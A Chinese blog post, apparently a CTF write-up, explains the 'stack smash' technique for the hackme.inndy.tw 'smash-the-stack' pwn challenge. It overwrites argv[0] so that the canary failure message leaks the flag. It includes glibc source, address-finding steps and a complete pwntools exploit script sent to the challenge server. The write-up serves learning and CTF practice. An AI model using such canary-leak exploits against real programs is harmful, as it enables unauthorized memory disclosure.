smash-the-stack wp

最新推荐文章于 2022-07-20 20:55:21 发布
最新推荐文章于 2022-07-20 20:55:21 发布
阅读量374 收藏
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zszcr/article/details/79787940
版权

题目提示:stderr is available, beware of the output

拿到题目惯例检查下防护机制:


发下开启了NX和Canary 两个防护机制

结合题目给的提示 ,可以大胆的猜测这是一个smashesattck

通过Canary 的防护机制泄露信息

ida反编译观察程序逻辑


发现它打开了flag文件,所以我们可以将程序的argv[0]覆盖成flag地址来输出flag

原理:

程序开启了Canary防护机制后 ,会在栈的返回地址前放一个Canary ,当函数返回时,会先检查canary的值是否正确,

如果错误的话则会调用__stack_chk_fail 来打印错误

我们不关心这个报错,但是我们可以利用这个函数来打印我们想输出的内容

void __attribute__ ((noreturn)) __stack_chk_fail (void)

{

  __fortify_fail ("stack smashing detected");

}

void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)

{

  /* The loop is added only to keep gcc happy.  */

  while (1)

    __libc_message (2, "*** %s ***: %s terminated\n",

                    msg, __libc_argv[0] ?: "");

}

__stack_chk_fail函数会打印argv[0]指针所指向的地址,所以我们只要把argv[0]覆盖成我们想输出的字符串的地址就可以打印出来了

要泄露出flag需要几个信息:

1.argv[0] 的地址 argv_add

2.buf 地址buf_add

3.flag的地址 flag_add

payload = 'a'*(argv_add - flag_add ) + p32(flag)

首先查找argv[0]的地址

在main函数头部下个断点


0xffffd288 所在地址存放着argv[0] 所以0xffffd0b4就是我们要找的地址

接下来找buf的地址:

在read()函数下个断点


当程序运行到read处时 单步进入函数 ,观察寄存器的值是否时read函数的参数

buf的地址就是0xffffcff8

最后用 find" flag{}" 找到flag地址 

exp:

from pwn import *
local = False
context.log_level = "debug"
if local:
	 p=process('./smash-the-stack')
else:
	p = remote('hackme.inndy.tw',7717)

def debug(address):
	raw_input("debug")
	gdb.attach(p,"b *"+address)

argv_add = 0xffffd0b4
buf_add = 0xffffcfdc
flag = 0x804a060
offset = argv_add - buf_add

payload = 'a'*188+p32(flag)
p.recv()
p.send(payload)
p.interactive()

zs0zrc
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Smashing The Stack
lyc
10-29 783
Smashing The StackReferenceSmashing the stack在许多C语言的实现中,有可能通过写入程序中所声明的数组的结尾部分来破坏可执行的堆栈.践踏堆栈使用的代码可以造成程序的返回异常,从而跳到任意的地址.这导致了一些极为
险恶的数据相关漏洞(已人所共知).其变种包括堆栈垃圾化(trash the stack),堆栈乱写(scribble the stack),堆栈毁坏
smashthestackwp
一个码农的笔记
11-13 2156
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了smashthestack这个题目感觉还不错,我把wp分享出来,方便大家学习 smashthestack的要求是:nc hackme.inndy.tw 7717Tips: stderr is available, beware of the output这个题目提示利用错误输出 下面我用ida打开smash
Smashing the Stack
12-16
stack for program ppt 函数调用时stack的变化
Wargames:io.smashthestack Level 2
请善待每一个被你欺负过的管理员 >_<
07-29 848
第二关,提供了2种通关方式。
Smash The Stack Wargame IO Level 01-04
PuziのPwn
07-23 442
Ref:http://smashthestack.org/ Dat:20140707
L-SMASH-Works_LSMASHSource_L-SMASH Source_R929_x86&x64;
11-10
L-SMASH-Works\LSMASHSource\L-SMASH Source R929 x86&x64;是用于avisynth的插件,目前用来读取MKV等视频的最好插件,最新的R929版本因为需要从国外站点下载导致国内不能下载,本人费了好大的劲才搞到的,在这里分享...
smash-master.rar
10-09
【标题】"smash-master.rar" 是一个压缩文件,很可能包含了一个名为 "smash-master" 的项目的源代码。"smash-master" 可能是一个软件开发项目,使用了某种编程语言,如Java、Python或C++等。由于标签是"源码",我们...
smash-stats-2
06-14
"smash-stats-2"是一个基于JavaScript的项目,主要用于统计数据,可能是一个游戏或者应用的数据分析工具。项目使用了现代前端开发的技术栈,包括Bower、npm和Gulp,这些都是JavaScript开发中的重要组成部分。 首先...
Knife Smash-crx插件
04-05
《Knife Smash-crx插件详解:拓展你的游戏体验与技术挑战》 在互联网技术日新月异的今天,浏览器插件已经成为我们个性化网络体验的重要工具。"Knife Smash-crx插件"便是这样一款专为喜爱投掷游戏的用户量身定制的...
COinS 2 SMASH-crx插件
04-04
COinS 2 SMASH-crx插件是一种针对法语用户设计的浏览器扩展程序,主要服务于在法国艾克斯-马赛大学学习的学生和研究人员。这个插件的核心功能是帮助用户与马赛图书馆的资源进行交互,并且能够方便地在线发布和分享...
好好说话之Stack smash
hollk’s blog
07-28 1934
Stack smash 我们之前一直没有做过关于canary保护的题,那么这个Stack smash就是绕过canary保护的技术。在程序加载了canary保护之后如果我们是在覆盖缓冲区的时候就会连带着覆盖了canary保护的cookie,这个时候程序就会报错。但是这个技术并不在乎是否报错,而是在乎报错的内容。stack smash技巧就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动canary保护之后,如果发现canary被修改的话就会执__stack_chk_fail函数来打印argv
Wargames:io.smashthestack Level 1
请善待每一个被你欺负过的管理员 >_<
07-29 710
我又开始刷题了。 第一关: 给定了一个
171119 Pwn-StackSmash
whklhhhh的博客
11-24 976
1625-5 王子昂 总结《2017年11月19日》 【连续第415天总结】 A. pwn-StackSmash B.原理当程序加了Cannary来保护时,栈溢出会使得程序异常终止并输出错误信息 StackSmash就是利用这个错误信息进行任意地址读取的 报错函数为__stack_chk_fail,代码如下:void __attribute__ ((noreturn)) __stack_c
Phrack安全杂志:详细分析堆栈溢出Smashing The Stack For Fun And Profit(Aleph One) 关于粉碎堆栈的秘密
「鸿渐之翼」的博客
08-14 1038
致敬:Aleph One 原文首发于Phrack,这是全球第一篇讲述堆栈漏洞的文章,里面提供了学习二进制安全的方法和基础理论知识,详细的描述了栈溢出的原理是什么?这里首次提到function prolouge 和 function epilogue,什么是Stack ?什么是Bufferoverflow?本文献给所有安全行业的研究者和贡献者,由于译者水平有限,翻译与原文内容稍有不同,请谅解。博主希望用质朴的语言展示二进制安全技术,让二进制安全进入大众视野。本文的实例全部可以在Linux平台上复现出来,文章.
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 411
stack smash
[转载]Smashing The Stack For Fun And Profit
weixin_30916125的博客
07-23 278
[转载]Smashing The Stack For Fun And Profit .oO Phrack 49 Oo. Volume Seven, Issue Forty-Nine ...
stack smahes
zszcr的博客
03-27 164
程序开启了Canary 保护 ,如果读取的buffer覆盖了相应的canary值 就会报错 ,调用__stack_chk_fail 来打印错误 ,我们不关心这报错 ,但是我们可以利用这个函数来打印我们想输出的内容void __attribute__ ((noreturn)) __stack_chk_fail (void){  __fortify_fail ("stack smashing dete...
服务器管理的标准SMASH
乐天的专栏
01-12 3107
今天在网上看到两条新闻,一条是《英特尔等4厂商联合制定服务器管理标准》(03-12-17),一条是《SMASH简化服务器管理》(2004-12-6),仔细看来,发现原来SMASH就是英特尔等4厂商联合制定的服务器管理标准,而那家工业组织就是分布式管理特别工作组(DMTF)标准组织。因此该标准不能小视,将来有可能成为服务器管理的工业标准。现将两份新闻列在下面。2004年12月16日,英特尔、
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1384
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.csdn.net/qq_42192672/article...
"新概念3册Lesson 6笔记:smash-and-grab案例分析
Lesson 6 of the New Concept 3 book introduces the concept of smash-and-grab robberies, where criminals quickly break into stores, steal items, and flee before anyone can stop them. In this lesson, we ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值